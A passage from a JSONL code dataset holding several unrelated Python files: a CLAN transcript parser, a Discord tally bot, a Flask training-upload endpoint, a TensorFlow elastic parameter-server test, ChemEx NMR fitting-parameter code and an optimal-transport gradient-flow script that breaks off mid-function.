= True\n else:\n clan_line.is_user_comment = True\n clan_line.content = line.split(\"\\t\")[1]\n\n if conv_block_started:\n clan_line.conv_block_num = current_conv_block\n clan_line.within_conv_block = True\n else:\n clan_line.conv_block_num = 0\n\n if line.startswith(\"%xdb:\"):\n clan_line.xdb_line = True\n xdb_regx_result = elements.xdb_regx.search(line)\n if xdb_regx_result:\n clan_line.xdb_average = xdb_regx_result.group(1)\n clan_line.xdb_peak = xdb_regx_result.group(2)\n\n if conv_block_started:\n clan_line.conv_block_num = current_conv_block\n clan_line.within_conv_block = True\n else:\n clan_line.conv_block_num = 0\n\n interv_regx_result = elements.interval_regx.search(line)\n\n if interv_regx_result:\n timestamp = interv_regx_result.group()\n onset = int(timestamp.split(\"_\")[0].replace(\"\\x15\", \"\"))\n offset = int(timestamp.split(\"_\")[1].replace(\"\\x15\", \"\"))\n clan_line.time_onset = onset\n clan_line.time_offset = offset\n clan_line.total_time = offset - onset\n\n # there's no timestamp on a tier line\n # (it wraps around to the next line)\n if last_line.is_tier_without_timestamp:\n last_line.time_onset = onset\n last_line.time_offset = offset\n last_line.total_time = offset - onset\n\n if conv_block_started:\n clan_line.conv_block_num = current_conv_block\n clan_line.within_conv_block = True\n else:\n clan_line.conv_block_num = 0\n if line.startswith(\"*\"):\n clan_line.tier = line[1:4]\n clan_line.content = line.split(\"\\t\")[1].replace(timestamp+\"\\n\", \"\")\n clan_line.is_tier_line = True\n\n else:\n if line.startswith(\"*\"):\n clan_line.tier = line[1:4]\n clan_line.content = line.split(\"\\t\")[1].replace(\"\\n\", \"\")\n clan_line.is_tier_line = True\n clan_line.is_tier_without_timestamp = True\n\n line_map.append(clan_line)\n last_line = clan_line\n\n # self.num_blocks = current_conv_block\n return line_map\n\n def block_map(self):\n return True\n\n def get_header(self):\n return [line for line in self.line_map\n if line.is_header]\n\n def write_entries_to_csv(self, path):\n with open(path, \"wb\") as output:\n writer = csv.writer(output)\n writer.writerow([\"file\", \"line\", \"timestamp\"])\n\n\n def write_to_cha(self, path):\n with open(path, \"wb\") as output:\n for line in self.line_map:\n output.write(line.line)\n\n def new_file_from_blocks(self, path, blocks=[], rewrite_timestamps=False,\n begin=1, end=None):\n \"\"\"\n This produces a new cha file with only the blocks specified\n\n Args:\n path: path to the new output cha file\n blocks: list of indices of blocks\n rewrite_timestamps: if True, then timestamps will be rewritten to\n start from 0 and be contiguous with each other\n\n \"\"\"\n blocks = sorted(blocks) #make sure they're in ascending order\n\n with open(path, \"wb\") as output:\n header = self.get_header()\n if blocks:\n blocks = self.get_conv_blocks(select=blocks)\n else:\n blocks = self.get_conv_blocks(begin=begin, end=end)\n\n for line in header:\n if not line.is_end_header:\n output.write(line.line)\n\n for line in blocks.line_map:\n output.write(line.line)\n\n output.write(self.end_tag)\n\n","sub_path":"pyclan/clanfile.py","file_name":"clanfile.py","file_ext":"py","file_size_in_byte":9317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"515737970","text":"import discord\nfrom discord.ext.commands import Bot\nimport discord.utils\n\n\n\nBOT_PREFIX = ('!bren')\nbot = Bot(command_prefix=BOT_PREFIX)\ntallydict = {}\n\n@bot.event\nasync def on_ready():\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('---------')\n\n@bot.command(name='addTally',\n description=\"Adds a tally\",\n brief=\"get roasted\",\n aliases=['tally', 'addtally', 'Addtally'],\n pass_context=True)\nasync def addTally(ctx, desUser: str, num: int):\n if desUser in tallydict:\n tallydict[desUser] += num\n msg = desUser + ' now has ' + str(tallydict[desUser]) + ' tallies.'\n await ctx.send(msg)\n else:\n tallydict[desUser] = num\n await ctx.send(desUser + ' has recieved their first tally. They now have ' + str(tallydict[desUser]) + ' tallies.')\n\n\n\n\n\n\n\n","sub_path":"src/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"68309813","text":"import os\nimport uuid\nfrom app import db\nfrom app.api import bp\nfrom app import uploadFolder\nfrom datetime import datetime\nfrom app.tasks import train_task\nfrom flask import jsonify, request, make_response, url_for\nfrom app.utils import make_message\nfrom app.utils import check_properties\nfrom app.models import Algorithm, DataFile, DataSet, DataResult\nfrom inspect import getmembers, isfunction\n\n\nexpectedContentType = \"multipart/form-data\"\n\n@bp.route('train/file', methods = ['POST'])\ndef train_file():\n ok, msg = check_properties(request, form = None, files = None, content_type = expectedContentType)\n if not ok:\n return jsonify(make_message(True, message = msg))\n \n form = request.form.to_dict()\n files = request.files.to_dict()\n\n originalTrainFileName = files.get('trainFile').filename\n originalTestFileName = files.get('testFile').filename\n\n trainFileExt = os.path.splitext(originalTrainFileName)[1]\n testFileExt = os.path.splitext(originalTestFileName)[1]\n trainMimeType = files.get('trainFile').mimetype\n testMimeType = files.get('testFile').mimetype\n trainFileName = uuid.uuid1().hex + trainFileExt\n testFileName = uuid.uuid1().hex + testFileExt\n \n try:\n files.get('trainFile').save(os.path.join(uploadFolder, trainFileName))\n files.get('testFile').save(os.path.join(uploadFolder, testFileName))\n except IOError as ioe:\n saveFileErrorMessage = 'I/O error during write of files: {}'.format(repr(ioe))\n print(saveFileErrorMessage)\n return jsonify(make_message(True, message = saveFileErrorMessage))\n except Exception as e:\n exceptionErrorMessage = 'Exception during file processing: {}'.format(repr(e))\n print(exceptionErrorMessage)\n return jsonify(make_message(True, message = exceptionErrorMessage))\n\n trainStats = os.stat(os.path.join(uploadFolder, trainFileName))\n testStats = os.stat(os.path.join(uploadFolder, testFileName))\n\n trainFileCreated = datetime.utcfromtimestamp(trainStats.st_ctime)\n testFileCreated = datetime.utcfromtimestamp(testStats.st_ctime)\n\n trainFileSize = trainStats.st_size\n testFileSize = testStats.st_size\n\n try:\n algorithm = db.session.query(Algorithm).filter_by(name = form['algorithmName']).one()\n except Exception as e:\n exceptionErrorMessage = 'Exception during algorithm search: {}. On searching for: {}'.format(repr(e), form['algorithmName'])\n print(exceptionErrorMessage)\n return jsonify(make_message(True, message = exceptionErrorMessage))\n \n trainFile = DataFile(\n originalfilename = originalTrainFileName,\n actualfilename = trainFileName,\n actualfilepath = uploadFolder,\n mimetype = trainMimeType,\n filesize = trainFileSize,\n created = datetime.utcnow(),\n fileprototype = \"train\")\n\n testFile = DataFile(\n originalfilename = originalTestFileName,\n actualfilename = testFileName,\n actualfilepath = uploadFolder,\n mimetype = testMimeType,\n filesize = testFileSize,\n created = datetime.utcnow(),\n fileprototype = \"test\")\n\n dataset = DataSet(\n name = form.get('dataName'),\n date = datetime.utcnow(),\n datatype = 'training',\n algorithm_id = algorithm.id)\n\n dataset.files = [trainFile, testFile]\n \n db.session.add(dataset)\n db.session.commit()\n\n task = train_task.apply_async(\n args = [\n os.path.join(uploadFolder, trainFileName),\n os.path.join(uploadFolder, testFileName),\n dataset.id, algorithm.script_name\n ]\n )\n message = make_message(False, taskstatusurl = url_for('api.task_status', task_name='train_task', task_id = task.id))\n\n return make_response(jsonify(message), 202)\n\n","sub_path":"iaproject/back/app/api/routes/trainfile.py","file_name":"trainfile.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"29764534","text":"import os\nimport subprocess\nimport time\nimport tensorflow as tf\n\nfrom utils.resolver import get_coordinator_resolver\nfrom utils.model import MyModel, get_datasets\nfrom tensorflow.python.eager import context\n\nfrom tensorflow.python.distribute.coordinator.cluster_coordinator import Worker\n\nif __name__ == \"__main__\":\n cluster_resolver = get_coordinator_resolver(num_workers=3)\n\n variable_partitioner = (\n tf.distribute.experimental.partitioners.FixedShardsPartitioner(\n num_shards=1))\n\n strategy = tf.distribute.experimental.ParameterServerStrategy(\n cluster_resolver,\n variable_partitioner=variable_partitioner)\n\n with strategy.scope():\n # Create an instance of the model\n model = MyModel()\n\n loss_object = tf.keras.losses.SparseCategoricalCrossentropy(\n reduction=tf.keras.losses.Reduction.NONE,\n from_logits=True)\n\n optimizer = tf.keras.optimizers.Adam()\n\n train_loss = tf.keras.metrics.Mean(name='train_loss')\n train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='train_accuracy')\n\n test_loss = tf.keras.metrics.Mean(name='test_loss')\n test_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='test_accuracy')\n\n def get_step_fn(comment=\"\"):\n @tf.function\n def step_fn(iterator):\n def train_step(images, labels):\n with tf.GradientTape() as tape:\n # training=True is only needed if there are layers with different\n # behavior during training versus inference (e.g. Dropout).\n predictions = model(images, training=True)\n loss = loss_object(labels, predictions)\n gradients = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n\n train_loss(loss)\n train_accuracy(labels, predictions)\n tf.print(\"loss-{}:\".format(comment), tf.math.reduce_mean(loss))\n return loss\n\n images, labels = next(iterator)\n losses = strategy.run(train_step, args=(images, labels))\n return strategy.reduce(tf.distribute.ReduceOp.SUM, losses, axis=None)\n return step_fn\n\n # Dispatch to Remote\n coordinator = tf.distribute.experimental.coordinator.ClusterCoordinator(strategy)\n\n # Must create dataset in this function.\n # Could not use a global function.\n def dataset_fn(_):\n train_ds, test_ds = get_datasets()\n return train_ds\n\n @tf.function\n def per_worker_dataset_fn():\n return strategy.distribute_datasets_from_function(dataset_fn)\n\n per_worker_train_ds = coordinator.create_per_worker_dataset(per_worker_dataset_fn)\n per_worker_train_iter = iter(per_worker_train_ds)\n\n EPOCHS = 5\n for epoch in range(EPOCHS):\n # Reset the metrics at the start of the next epoch\n train_loss.reset_states()\n train_accuracy.reset_states()\n test_loss.reset_states()\n test_accuracy.reset_states()\n coordinator.join()\n\n step = 50\n if epoch == 1:\n # add worker 3\n tf.config.experimental_connect_to_cluster(\n get_coordinator_resolver(num_workers=4),\n job_name=\"chief\")\n coordinator._cluster.workers.append(\n Worker(3, \"/job:worker/replica:0/task:3\", coordinator._cluster)\n )\n per_worker_train_ds = coordinator.create_per_worker_dataset(per_worker_dataset_fn)\n per_worker_train_iter = iter(per_worker_train_ds)\n\n if epoch == 2:\n # add worker 4\n tf.config.experimental_connect_to_cluster(\n get_coordinator_resolver(num_workers=5),\n job_name=\"chief\")\n coordinator._cluster.workers.append(\n Worker(4, \"/job:worker/replica:0/task:4\", coordinator._cluster)\n )\n per_worker_train_ds = coordinator.create_per_worker_dataset(per_worker_dataset_fn)\n per_worker_train_iter = iter(per_worker_train_ds)\n\n if epoch == 3:\n # stop worker 0\n coordinator._cluster.workers[0].stop()\n # manually kill worker 0 with hardcoding\n pids = os.popen(\"ps -a | grep 'port 2101' | awk '{print $1}'\").read().split(\"\\n\")\n os.system(\"kill {}\".format(\" \".join(pids)))\n\n \n if epoch == 4:\n # restart worker 0\n proc = subprocess.Popen('python3 ./worker.py --role=worker --idx=0 --port 2101 >> ./worker_0.log 2>&1',\n shell=True)\n # wait for the new server to start\n time.sleep(5)\n tf.config.experimental_connect_to_cluster(\n get_coordinator_resolver(num_workers=5),\n job_name=\"chief\")\n per_worker_train_ds = coordinator.create_per_worker_dataset(per_worker_dataset_fn)\n per_worker_train_iter = iter(per_worker_train_ds)\n coordinator._cluster.workers[0].restart()\n\n step_fn = get_step_fn(epoch + 1)\n for i in range(step):\n coordinator.schedule(step_fn,\n args=(per_worker_train_iter,))\n coordinator.join()\n train_loss_result = train_loss.result()\n train_accuracy_result = train_accuracy.result()\n coordinator.join()\n print(\n f'Epoch {epoch + 1}, '\n f'Loss: {train_loss_result}, '\n f'Accuracy: {train_accuracy_result * 100}, ',\n flush=True\n )\n proc.terminate()","sub_path":"mnist-worker-elastic/coordinator.py","file_name":"coordinator.py","file_ext":"py","file_size_in_byte":5632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"420311501","text":"\"\"\"The parameters module contains the code for handling of the experimental and\nfitting parameters.\"\"\"\nimport ast\nimport configparser\nimport copy\nimport pathlib\nimport re\nfrom difflib import get_close_matches\n\nimport lmfit\nimport numpy as np\nfrom asteval import astutils\n\nfrom chemex import peaks\nfrom chemex import util\n\nNAME_MARKERS = {\n \"name\": \"__n_{}_n__\",\n \"nuclei\": \"__r_{}_r__\",\n \"temperature\": \"__t_{}_t__\",\n \"h_larmor_frq\": \"__b_{}_b__\",\n \"p_total\": \"__p_{}_p__\",\n \"l_total\": \"__l_{}_l__\",\n}\n\nFRIENDLY_MARKERS = {\n \"name\": \"{}\",\n \"nuclei\": \"NUC->{}\",\n \"temperature\": \"T->{:.1f}C\",\n \"h_larmor_frq\": \"B0->{:.1f}MHz\",\n \"p_total\": \"[P]->{:e}M\",\n \"l_total\": \"[L]->{:e}M\",\n}\n\nRE_QUALIFIERS = re.compile(\n \"\"\"\n (^\\s*(?P\\w+)) |\n (NUC\\s*->\\s*(?P(\\w|-)+)) |\n (T\\s*->s*(?P{0})) |\n (B0\\s*->\\s*(?P{0})) |\n (\\[P\\]\\s*->\\s*(?P{0})) |\n (\\[L\\]\\s*->\\s*(?P{0})) |\n \"\"\".format(\n \"[-+]?[0-9]*\\.?[0-9]+(e[-+]?[0-9]+)?\"\n ),\n re.IGNORECASE | re.VERBOSE,\n)\n\n# Regular expression to pick values of the form: intial value [min, max]\nRE_VALUE_MIN_MAX = re.compile(\n \"\"\"\n ^\\s*\n (?P{0})?\\s*\n (\\[\\s*(?P({0}|{1}))\\s*,\\s*(?P({0}|{1}))\\s*\\]\\s*)?\n .*$\n \"\"\".format(\n \"[-+]?[0-9]*\\.?[0-9]+(e[-+]?[0-9]+)?\", \"[-+]?inf\"\n ),\n re.IGNORECASE | re.VERBOSE,\n)\n\n# Regular expression to pick values of the form:\n# intial value [min, max, brute_stepsize]\nRE_VALUE_MIN_MAX_BRUTE = re.compile(\n \"\"\"\n ^\\s*\n (?P{0})?\\s*\n (\\[\\s*(?P({0}|{1}))\\s*,\n \\s*(?P({0}|{1}))\\s*,\n \\s*(?P({0}|None))\\s*\n \\]\\s*)?\n .*$\n \"\"\".format(\n \"[-+]?[0-9]*\\.?[0-9]+(e[-+]?[0-9]+)?\", \"[-+]?inf\"\n ),\n re.IGNORECASE | re.VERBOSE,\n)\n\nRE_PARNAME = re.compile(\n \"\"\"\n (__n_(?P\\w+)_n__)?\n (__r_(?P(\\w|-)+)_r__)?\n (__t_(?P{0})_t__)?\n (__b_(?P{0})_b__)?\n (__p_(?P{0})_p__)?\n (__l_(?P{0})_l__)?\n \"\"\".format(\n \"[-+]?[0-9]*\\.?[0-9]+(e[-+]?[0-9]+)?\"\n ),\n re.IGNORECASE | re.VERBOSE,\n)\n\n\nclass MakeTranslate:\n \"\"\"MakeTranslate class for translating parameter names.\n\n From: www.oreilly.com/library/view/python-cookbook-2nd/0596007973/ch01s19.html\n \"\"\"\n\n def __init__(self, *args, **kwds):\n self.dictionary = dict(*args, **kwds)\n self.re_expr = self.make_re_expr()\n\n def make_re_expr(self):\n \"\"\"TODO: method docstring.\"\"\"\n return re.compile(\"|\".join(map(re.escape, self.dictionary)), re.IGNORECASE)\n\n def one_xlat(self, match):\n \"\"\"TODO: method docstring.\"\"\"\n return self.dictionary[match.group(0)]\n\n def __call__(self, text):\n return self.re_expr.sub(self.one_xlat, text)\n\n\nEXPAND = MakeTranslate({\"-\": \"__minus__\", \"+\": \"__plus__\", \".\": \"__point__\"})\nCOMPRESS = MakeTranslate({\"__minus__\": \"-\", \"__plus__\": \"+\", \"__point__\": \".\"})\n\n\nclass ParamName:\n \"\"\"ParameterName class.\"\"\"\n\n def __init__(\n self,\n name=None,\n nuclei=None,\n temperature=None,\n h_larmor_frq=None,\n p_total=None,\n l_total=None,\n ):\n self.name = self.nuclei = self.temperature = self.h_larmor_frq = None\n self.p_total = self.l_total = None\n\n if name is not None:\n self.name = name.lower()\n\n if nuclei is not None:\n self.nuclei = peaks.Peak(nuclei).assignment\n\n if temperature is not None:\n self.temperature = round(float(temperature), 1)\n\n if h_larmor_frq is not None:\n self.h_larmor_frq = round(float(h_larmor_frq), 1)\n\n if p_total is not None:\n self.p_total = float(p_total)\n\n if l_total is not None:\n self.l_total = float(l_total)\n\n @classmethod\n def from_fname(cls, full_name=None):\n \"\"\"TODO: method docstring.\"\"\"\n if full_name is None:\n full_name = \"\"\n\n full_name = COMPRESS(full_name)\n\n match = re.match(RE_PARNAME, full_name)\n qualifiers = {}\n if match is not None:\n qualifiers.update(match.groupdict())\n\n return cls(**qualifiers)\n\n @classmethod\n def from_section(cls, section=None):\n \"\"\"TODO: method docstring.\"\"\"\n if section is None:\n section = \"\"\n qualifiers = re_to_dict(RE_QUALIFIERS, section)\n\n return cls(**qualifiers)\n\n def update_nuclei(self, nuclei=None):\n \"\"\"TODO: method docstring.\"\"\"\n if nuclei is not None:\n self.nuclei = peaks.Peak(nuclei).assignment\n\n return self\n\n def to_full_name(self):\n \"\"\"TODO: method docstring.\"\"\"\n name_components = []\n\n for attribute, value in vars(self).items():\n if value is not None:\n name_components.append(NAME_MARKERS[attribute].format(value))\n\n full_name = EXPAND(\"\".join(name_components))\n\n return full_name\n\n def to_section_name(self, nuclei=False):\n \"\"\"TODO: method docstring.\"\"\"\n\n name_components = []\n\n for attribute, value in vars(self).items():\n if (attribute != \"nuclei\" or nuclei) and value is not None:\n name_components.append(FRIENDLY_MARKERS[attribute].format(value))\n\n section_name = \", \".join(name_components).upper()\n\n return section_name\n\n def to_re(self):\n \"\"\"TODO: method docstring.\"\"\"\n re_components = [NAME_MARKERS[\"name\"].format(EXPAND(self.name))]\n\n if self.nuclei is not None:\n group_name = peaks.Peak(self.nuclei)._resonances[\"i\"][\"group\"]\n if not group_name:\n all_res = \"\\D?[0-9]+[abd-gi-mopr-z]*\"\n else:\n all_res = \"\"\n re_components.append(\n NAME_MARKERS[\"nuclei\"].format(\"\".join([all_res, EXPAND(self.nuclei)]))\n )\n else:\n re_components.append(\".*\")\n\n if self.temperature is not None:\n re_components.append(\n NAME_MARKERS[\"temperature\"].format(EXPAND(str(self.temperature)))\n )\n elif re_components[-1] != \".*\":\n re_components.append(\".*\")\n\n if self.h_larmor_frq is not None:\n re_components.append(\n NAME_MARKERS[\"h_larmor_frq\"].format(EXPAND(str(self.h_larmor_frq)))\n )\n elif re_components[-1] != \".*\":\n re_components.append(\".*\")\n\n if self.p_total is not None:\n re_components.append(\n NAME_MARKERS[\"p_total\"].format(EXPAND(str(self.p_total)))\n )\n elif re_components[-1] != \".*\":\n re_components.append(\".*\")\n\n if self.l_total is not None:\n re_components.append(\n NAME_MARKERS[\"l_total\"].format(EXPAND(str(self.l_total)))\n )\n elif re_components[-1] != \".*\":\n re_components.append(\".*\")\n\n re_to_match = re.compile(\"\".join(re_components), re.IGNORECASE)\n\n return re_to_match\n\n def __repr__(self):\n return self.to_section_name(nuclei=True)\n\n def __lt__(self, other):\n tuple_self = (\n self.name,\n self.temperature,\n self.h_larmor_frq,\n self.p_total,\n self.l_total,\n peaks.Peak(self.nuclei),\n )\n\n tuple_other = (\n other.name,\n other.temperature,\n other.h_larmor_frq,\n other.p_total,\n other.l_total,\n peaks.Peak(other.nuclei),\n )\n\n return tuple_self < tuple_other\n\n def intersection(self, other):\n \"\"\"TODO: method docstring.\"\"\"\n name = temperature = h_larmor_frq = p_total = l_total = None\n\n if self.name == other.name:\n name = self.name\n\n nuclei = (\n peaks.Peak(self.nuclei).intersection(peaks.Peak(other.nuclei)).assignment\n )\n\n if not nuclei:\n nuclei = None\n\n if self.temperature == other.temperature:\n temperature = self.temperature\n\n if self.h_larmor_frq == other.h_larmor_frq:\n h_larmor_frq = self.h_larmor_frq\n\n if self.p_total == other.p_total:\n p_total = self.p_total\n\n if self.l_total == other.l_total:\n l_total = self.l_total\n\n return ParamName(\n name=name,\n nuclei=nuclei,\n temperature=temperature,\n h_larmor_frq=h_larmor_frq,\n p_total=p_total,\n l_total=l_total,\n )\n\n\ndef create_params(data):\n \"\"\"Create the array of fitting parameters.\"\"\"\n params = lmfit.Parameters()\n\n for profile in data:\n for name, param in profile.params.items():\n if name in params:\n vary = params[name].vary\n else:\n vary = False\n param._delay_asteval = True\n params[name] = param\n params[name].vary = vary | param.vary\n\n for p in params.values():\n p._delay_asteval = False\n\n return params\n\n\ndef set_params_from_config_file(params, config_filename):\n \"\"\"Read the parameter file and set initial values and optional bounds and brute\n step size.\"\"\"\n\n print(f\"File Name: {config_filename}\", end=\"\\n\\n\")\n\n config = util.read_cfg_file(config_filename)\n\n print(\"{:<45s} {:<30s}\".format(\"Section\", \"Matches\"))\n print(\"{:<45s} {:<30s}\".format(\"-------\", \"-------\"))\n\n for section in config.sections():\n if section.lower() in (\"global\", \"default\"):\n print(\"{:<45s}\".format(f\"[{section}]\"))\n\n for key, value in config.items(section):\n name = ParamName.from_section(key)\n if value.count(\",\") == 2:\n default = re_to_dict(RE_VALUE_MIN_MAX_BRUTE, value)\n else:\n default = re_to_dict(RE_VALUE_MIN_MAX, value)\n default = {key: np.float64(val) for key, val in default.items()}\n matches = set_params(params, name, **default)\n\n print(\" {:<43s} {:<30d}\".format(f\"({key})\", len(matches)))\n\n else:\n name = ParamName.from_section(section)\n\n pairs = []\n\n for key, value in config.items(section):\n if \"file\" in key:\n for filename in value.split():\n filename_ = pathlib.Path(filename)\n filename_ = util.normalize_path(\n config_filename.parent, filename_\n )\n pairs.extend(get_pairs_from_file(filename_, name))\n\n elif peaks.RE_PEAK_NAME.match(key):\n name.update_nuclei(key)\n pairs.append((copy.deepcopy(name), value))\n\n total_matches = set()\n\n for name, value in pairs:\n if value.count(\",\") == 2:\n default = re_to_dict(RE_VALUE_MIN_MAX_BRUTE, value)\n else:\n default = re_to_dict(RE_VALUE_MIN_MAX, value)\n default = {key: np.float64(val) for key, val in default.items()}\n matches = set_params(params, name, **default)\n total_matches.update(matches)\n\n print(\"{:<45s} {:<30d}\".format(f\"[{section}]\", len(total_matches)))\n\n\ndef get_pairs_from_file(filename, name):\n \"\"\"Read residue specific values for fitting parameters from a file.\n\n The file should be formatted like a Sparky peak list.\n Examples:\n * To set G23N to 105.0 and G23H to 8.0:\n G23N-H 105.0 8.0\n * To set a parameter depending on multiple nuclei (e.g., G23N and G23H):\n G23N-H -93.0\n\n \"\"\"\n pairs = []\n\n with open(filename) as f:\n for line in f:\n if \"Assignment\" in line:\n continue\n\n line = remove_comments(line, \"#;\")\n line = re.sub(\"\\s*\\[\\s*\", \"[\", line)\n line = re.sub(\"\\s*\\]\\s*\", \"]\", line)\n elements = line.split()\n\n if len(elements) > 1:\n peak = peaks.Peak(elements[0])\n n_resonances = len(peak)\n n_cols = len(elements[1:])\n\n if n_cols == n_resonances:\n for nuc_name, value in zip(peak.names.values(), elements[1:]):\n name.update_nuclei(nuc_name)\n pairs.append((copy.deepcopy(name), value))\n\n else:\n name.update_nuclei(peak.assignment)\n pairs.append((copy.deepcopy(name), elements[1]))\n\n return pairs\n\n\ndef set_param_status(params, items):\n \"\"\"Set whether or not to vary a fitting parameter or to use a mathemetical\n expression.\"\"\"\n\n vary = {\"fix\": False, \"fit\": True}\n\n for key, status in items:\n name = ParamName.from_section(key)\n\n if status in vary:\n set_params(params, name, vary=vary[status], expr=\"\")\n else:\n set_param_expr(params, name, expr=status)\n\n\ndef set_param_expr(params, name, expr=None):\n \"\"\"Set an optional parameter expression, used to constrain its value during\n the fit.\"\"\"\n\n if expr is None:\n expr = \"\"\n\n if not isinstance(name, ParamName):\n name = ParamName.from_section(name)\n\n names_full = [name_full for name_full in params if name.to_re().match(name_full)]\n names_expr = astutils.get_ast_names(ast.parse(expr))\n names_full_expr = {\n name: [\n name_full_expr\n for name_full_expr in params\n if ParamName.from_section(name).to_re().match(name_full_expr)\n ]\n for name in names_expr\n }\n\n matches = set()\n\n for name_full in names_full:\n\n expr_ = expr\n\n for name_expr in names_expr:\n name_full_expr = get_close_matches(\n name_full, names_full_expr[name_expr], n=1\n )[0]\n expr_ = expr_.replace(name_expr, name_full_expr)\n\n params[name_full].expr = expr_\n\n matches.add(name_full)\n\n return matches\n\n\ndef set_params(\n params,\n name_short,\n value=None,\n vary=None,\n min=None,\n max=None,\n expr=None,\n brute_step=None,\n):\n \"\"\"Set the initial value and (optional) bounds and brute step size for\n parameters.\"\"\"\n matches = set()\n name_short_re = name_short.to_re()\n\n for name, param in params.items():\n if name_short_re.match(name):\n if expr is None and param.expr and vary is None:\n param.value = value\n else:\n param.set(value, vary, min, max, expr, brute_step)\n matches.add(name)\n\n return matches\n\n\ndef write_par(params, path):\n \"\"\"Write the fitting parameters and their uncertainties to a file.\"\"\"\n filename = path / \"parameters.fit\"\n\n print(f\" * {filename}\")\n\n par_dict = {}\n\n for name, param in params.items():\n\n par_name = ParamName.from_fname(name)\n\n if par_name.nuclei is None: # global parameter\n name_print = par_name\n section = \"GLOBAL\"\n\n else: # residue-specific parameter\n name_print = peaks.Peak(par_name.nuclei)\n section = par_name.to_section_name()\n\n if not param.vary and param.expr is None:\n val_print = f\"{param.value:.5e} ; fixed\"\n elif param.stderr is None:\n val_print = f\"{param.value:.5e} ; error not calculated\"\n elif param.expr:\n val_print = f\"{param.value:.5e} +/- {param.stderr:.5e} ; constrained\"\n else:\n val_print = f\"{param.value:.5e} +/- {param.stderr:.5e}\"\n\n par_dict.setdefault(section, []).append((name_print, val_print))\n\n cfg = configparser.ConfigParser()\n cfg.optionxform = str\n\n section_global = par_dict.pop(\"GLOBAL\", None)\n\n if section_global is not None:\n cfg.add_section(\"GLOBAL\")\n for name, val in sorted(section_global):\n cfg.set(\"GLOBAL\", str(name), val)\n\n for section, name_vals in sorted(par_dict.items()):\n cfg.add_section(section)\n for peak, val in sorted(name_vals):\n cfg.set(section, peak.assignment.upper(), val)\n\n with open(filename, \"w\") as f:\n cfg.write(f)\n\n\ndef write_constraints(params, path):\n \"\"\"Write the (optional) parameter expression constraints to a file.\"\"\"\n filename = path / \"constraints.fit\"\n\n print(f\" * {filename}\")\n\n param_dict = dict()\n\n for name, param in params.items():\n\n par_name = ParamName.from_fname(name)\n\n if param.expr:\n name_formatted = \"[{}]\".format(par_name.to_section_name(nuclei=True))\n expr_formatted = param.expr\n for name_dep in astutils.get_ast_names(ast.parse(param.expr)):\n par_name_dep = ParamName.from_fname(name_dep)\n if str(par_name_dep):\n expr_formatted = expr_formatted.replace(\n name_dep,\n \"[{}]\".format(par_name_dep.to_section_name(nuclei=True)),\n )\n\n param_dict[par_name] = f\"{name_formatted} = {expr_formatted}\\n\"\n\n with open(filename, \"w\") as f:\n for name, constraint in sorted(param_dict.items()):\n f.write(constraint)\n\n\ndef remove_comments(line, sep):\n \"\"\"Remove (optional) comments.\"\"\"\n for a_sep in sep:\n line = line.split(a_sep)[0]\n\n return line.strip()\n\n\ndef re_to_dict(re_to_match, text):\n \"\"\"TODO: function docstring.\"\"\"\n return {\n match_key: match_value\n for match in re_to_match.finditer(text)\n for match_key, match_value in match.groupdict().items()\n if match_value is not None\n }\n","sub_path":"chemex/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":17725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"159950160","text":"\"\"\"\nGradient flows in 2D\n====================\n\nLet's showcase the properties of **kernel MMDs**, **Hausdorff**\nand **Sinkhorn** divergences on a simple toy problem:\nthe registration of one blob onto another.\n\"\"\"\nimport ot\n\n##############################################\n# Setup\n# ---------------------\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nfrom utils import cost_matrix\nimport torch\nimport numpy as np\nimport torch\nfrom random import choices\nfrom imageio import imread\nfrom matplotlib import pyplot as plt\nimport cvxpy as cp\nfrom geomloss import SamplesLoss\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ndef solve_uot_original(C, a, b, tau1, tau2, solver='ECOS', verbose=False):\n X = cp.Variable((a.shape[0], b.shape[0]))\n\n sum_X = cp.sum(X)\n sum_rowX = cp.sum(X, axis=1)\n sum_colX = cp.sum(X, axis=0)\n\n cost = cp.sum(cp.multiply(X, C))\n kl_row = - cp.sum(cp.entr(sum_rowX)) - cp.sum(cp.multiply(sum_rowX, cp.log(a.reshape(-1, )))) - sum_X + cp.sum(a.reshape(-1, ))\n kl_col = - cp.sum(cp.entr(sum_colX)) - cp.sum(cp.multiply(sum_colX, cp.log(b.reshape(-1, )))) - sum_X + cp.sum(b.reshape(-1, ))\n\n total_cost = cost + tau1 * kl_row + tau2 * kl_col\n\n objective = cp.Minimize(total_cost)\n constraints = [0 <= X]\n\n prob = cp.Problem(objective, constraints)\n prob.solve(solver=solver, verbose=verbose)\n\n return prob.value, X.value\ndef compute_true_Wasserstein(X,Y,p=2):\n M = ot.dist(X.detach().numpy(), Y.detach().numpy())\n a = np.ones((X.shape[0],)) / X.shape[0]\n b = np.ones((Y.shape[0],)) / Y.shape[0]\n return ot.emd2(a, b, M)\ndef compute_Wasserstein(M,device='cuda',e=0):\n if(e==0):\n pi = ot.emd([],[],M.cpu().detach().numpy()).astype('float32')\n else:\n pi = ot.sinkhorn([], [], M.cpu().detach().numpy(),reg=e).astype('float32')\n pi = torch.from_numpy(pi).to(device)\n return torch.sum(pi*M)\ndef mOT(firsttensor, secondtensor, p=2, device='cpu',numbatch=4,batch_size=16,e=0):\n inds1=[]\n inds2=[]\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n w = compute_Wasserstein(M, device,e)\n ll.append(w)\n return 